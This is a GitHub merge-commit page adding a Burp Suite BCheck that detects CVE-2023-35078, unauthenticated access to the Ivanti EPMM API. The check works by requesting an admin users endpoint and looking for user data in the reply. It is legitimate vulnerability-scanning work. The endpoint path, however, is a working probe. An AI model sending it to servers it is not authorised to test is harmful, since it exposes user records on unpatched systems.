Merge pull request #88 from DolphFlynn/cve-2023-35078

CVE-2023-35078
PortSwigger · Aug 22, 2023 · 7deaf3c · 7deaf3c
2 parents e1e551b + 6766183
commit 7deaf3c
Showing 1 changed file with 26 additions and 0 deletions.
diff --git a/vulnerabilities-CVEd/CVE-2023-35078 Ivanti EPMM Unauthenticate Access.bcheck b/vulnerabilities-CVEd/CVE-2023-35078 Ivanti EPMM Unauthenticate Access.bcheck
@@ -0,0 +1,26 @@
+metadata:
+    language: v1-beta
+    name: "Ivanti API Unauthenticated Access"
+    description: "Ivanti Endpoint Manager Mobile (EPMM) - Unauthenticated Access"
+    author: "Dolph Flynn"
+    tags: "Ivanti", "Unauthenticated Access", "CVE-2023-35078"
+
+
+given host then
+    send request called check:
+        method: "GET"
+        path: "/mifs/aad/api/v2/admins/users"
+
+    if {check.response.status_code} is "200" and
+        {check.response.headers} matches "application/json" and
+        "name" in {check.response.body} and
+        "results" in {check.response.body} and
+        "userId" in {check.response.body}
+    then
+        report issue:
+            severity: high
+            confidence: certain
+            detail: "Ivanti EPMM API unauthenticated access (CVE-2023-35078) detected."
+            remediation: "Apply vendor patch to fix vulnerability."
+    end if
+